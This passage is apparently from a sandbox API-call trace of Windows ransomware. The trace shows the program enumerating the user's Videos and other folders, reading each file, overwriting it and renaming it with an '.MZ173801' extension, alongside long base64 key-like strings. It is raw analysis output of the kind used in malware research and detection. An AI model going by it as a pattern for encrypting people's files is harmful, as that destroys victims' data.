nFileSizeLow=0x182c, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="rAI6kR Z24Gt07MNyb.wav.MZ173801", cAlternateFileName="RAI6KR~1.MZ1")) returned 0 [0118.222] GetLastError () returned 0x12 [0118.223] FindClose (in: hFindFile=0xa1bc78 | out: hFindFile=0xa1bc78) returned 1 [0118.223] FindNextFileW (in: hFindFile=0xa1bab8, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd45a9b70, ftCreationTime.dwHighDateTime=0x1d5eb70, ftLastAccessTime.dwLowDateTime=0xf4ae9e40, ftLastAccessTime.dwHighDateTime=0x1d5ecc3, ftLastWriteTime.dwLowDateTime=0xa6f8cf76, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x147ed, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="CovaDgRA8.m4a.MZ173801", cAlternateFileName="COVADG~1.MZ1")) returned 1 [0118.223] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0118.223] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0118.223] FindNextFileW (in: hFindFile=0xa1bab8, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15a114c0, ftCreationTime.dwHighDateTime=0x1d5e855, ftLastAccessTime.dwLowDateTime=0x211c040, ftLastAccessTime.dwHighDateTime=0x1d5f0f1, ftLastWriteTime.dwLowDateTime=0xa7097e57, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x5593, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="dBFbFeABajg.m4a.MZ173801", cAlternateFileName="DBFBFE~1.MZ1")) returned 1 [0118.223] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0118.355] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0118.706] FindNextFileW (in: hFindFile=0xa1bab8, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3eb563d0, ftCreationTime.dwHighDateTime=0x1d5f0a6, ftLastAccessTime.dwLowDateTime=0x3ed3930, ftLastAccessTime.dwHighDateTime=0x1d5ec1e, ftLastWriteTime.dwLowDateTime=0xa70be136, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x5bb0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="Q005Y62fvMbMZrM r-4F.wav.MZ173801", cAlternateFileName="Q005Y6~1.MZ1")) returned 1 [0118.706] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0118.706] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0118.706] FindNextFileW (in: hFindFile=0xa1bab8, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3eb563d0, ftCreationTime.dwHighDateTime=0x1d5f0a6, ftLastAccessTime.dwLowDateTime=0x3ed3930, ftLastAccessTime.dwHighDateTime=0x1d5ec1e, ftLastWriteTime.dwLowDateTime=0xa70be136, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x5bb0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="Q005Y62fvMbMZrM r-4F.wav.MZ173801", cAlternateFileName="Q005Y6~1.MZ1")) returned 0 [0118.706] GetLastError () returned 0x12 [0118.706] FindClose (in: hFindFile=0xa1bab8 | out: hFindFile=0xa1bab8) returned 1 [0118.707] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c22ad20, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe24d7270, ftLastAccessTime.dwHighDateTime=0x1d5e98b, ftLastWriteTime.dwLowDateTime=0xe24d7270, ftLastWriteTime.dwHighDateTime=0x1d5e98b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="stszJlZAZD-p", cAlternateFileName="STSZJL~1")) returned 0 [0118.707] GetLastError () returned 0x12 [0118.707] FindClose (in: hFindFile=0xa1b738 | out: hFindFile=0xa1b738) returned 1 [0118.707] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x19fb48, csidl=14, fCreate=0 | out: pszPath="C:\\Users\\FD1HVy\\Videos") returned 1 [0118.709] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos" (normalized: "c:\\users\\fd1hvy\\videos")) returned 0x11 [0118.709] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x19fb48, csidl=14, fCreate=0 | out: pszPath="C:\\Users\\FD1HVy\\Videos") returned 1 [0118.709] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\*.*", lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe55787f1, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe55787f1, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xa1b738 [0118.709] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe55787f1, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe55787f1, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0118.709] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe11ad870, ftCreationTime.dwHighDateTime=0x1d5ed05, ftLastAccessTime.dwLowDateTime=0x169ab8c0, ftLastAccessTime.dwHighDateTime=0x1d5eb4f, ftLastWriteTime.dwLowDateTime=0x169ab8c0, ftLastWriteTime.dwHighDateTime=0x1d5eb4f, nFileSizeHigh=0x0, nFileSizeLow=0x2de9, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="4AH f2Bl8-ulR2EqiiLE.mkv", cAlternateFileName="4AHF2B~1.MKV")) returned 1 [0118.709] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa60 | out: lpLocalFileTime=0x19fa60) returned 1 [0118.709] FileTimeToDosDateTime (in: lpFileTime=0x19fa60, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0118.709] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\4AH f2Bl8-ulR2EqiiLE.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\4ah f2bl8-ulr2eqiile.mkv"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe11ad870, ftCreationTime.dwHighDateTime=0x1d5ed05, ftLastAccessTime.dwLowDateTime=0x169ab8c0, ftLastAccessTime.dwHighDateTime=0x1d5eb4f, ftLastWriteTime.dwLowDateTime=0x169ab8c0, ftLastWriteTime.dwHighDateTime=0x1d5eb4f, nFileSizeHigh=0x0, nFileSizeLow=0x2de9)) returned 1 [0118.710] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0118.710] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0118.710] GetCurrentThreadId () returned 0x1358 [0118.710] GetCurrentThreadId () returned 0x1358 [0118.710] GetCurrentThreadId () returned 0x1358 [0118.711] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0118.711] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0118.711] GetCurrentThreadId () returned 0x1358 [0118.711] GetCurrentThreadId () returned 0x1358 [0118.711] GetCurrentThreadId () returned 0x1358 [0118.711] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\4AH f2Bl8-ulR2EqiiLE.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\4ah f2bl8-ulr2eqiile.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3fc [0118.711] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0118.711] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0118.711] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x2de9 [0118.711] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0118.711] ReadFile (in: hFile=0x3fc, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x2de9, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x2de9, lpOverlapped=0x0) returned 1 [0118.712] CloseHandle (hObject=0x3fc) returned 1 [0118.712] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\4AH f2Bl8-ulR2EqiiLE.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\4ah f2bl8-ulr2eqiile.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3fc [0118.713] WriteFile (in: hFile=0x3fc, lpBuffer=0x2435b60*, nNumberOfBytesToWrite=0x2de9, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2435b60*, lpNumberOfBytesWritten=0x19f9bc*=0x2de9, lpOverlapped=0x0) returned 1 [0118.714] CloseHandle (hObject=0x3fc) returned 1 [0118.715] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\4AH f2Bl8-ulR2EqiiLE.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\4ah f2bl8-ulr2eqiile.mkv"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\4AH f2Bl8-ulR2EqiiLE.mkv.MZ173801" (normalized: "c:\\users\\fd1hvy\\videos\\4ah f2bl8-ulr2eqiile.mkv.mz173801")) returned 1 [0118.716] GetCurrentThreadId () returned 0x1358 [0118.716] GetCurrentThreadId () returned 0x1358 [0118.716] GetCurrentThreadId () returned 0x1358 [0118.716] GetCurrentThreadId () returned 0x1358 [0118.716] GetCurrentThreadId () returned 0x1358 [0118.716] GetCurrentThreadId () returned 0x1358 [0118.716] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35d05690, ftCreationTime.dwHighDateTime=0x1d5f000, ftLastAccessTime.dwLowDateTime=0xc779b920, ftLastAccessTime.dwHighDateTime=0x1d5ede3, ftLastWriteTime.dwLowDateTime=0xc779b920, ftLastWriteTime.dwHighDateTime=0x1d5ede3, nFileSizeHigh=0x0, nFileSizeLow=0x18fb8, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="Axgfxe603muHSLYjsgC.swf", cAlternateFileName="AXGFXE~1.SWF")) returned 1 [0118.716] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0118.716] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0118.716] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\Axgfxe603muHSLYjsgC.swf" (normalized: "c:\\users\\fd1hvy\\videos\\axgfxe603muhslyjsgc.swf"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35d05690, ftCreationTime.dwHighDateTime=0x1d5f000, ftLastAccessTime.dwLowDateTime=0xc779b920, ftLastAccessTime.dwHighDateTime=0x1d5ede3, ftLastWriteTime.dwLowDateTime=0xc779b920, ftLastWriteTime.dwHighDateTime=0x1d5ede3, nFileSizeHigh=0x0, nFileSizeLow=0x18fb8)) returned 1 [0118.717] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0118.717] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1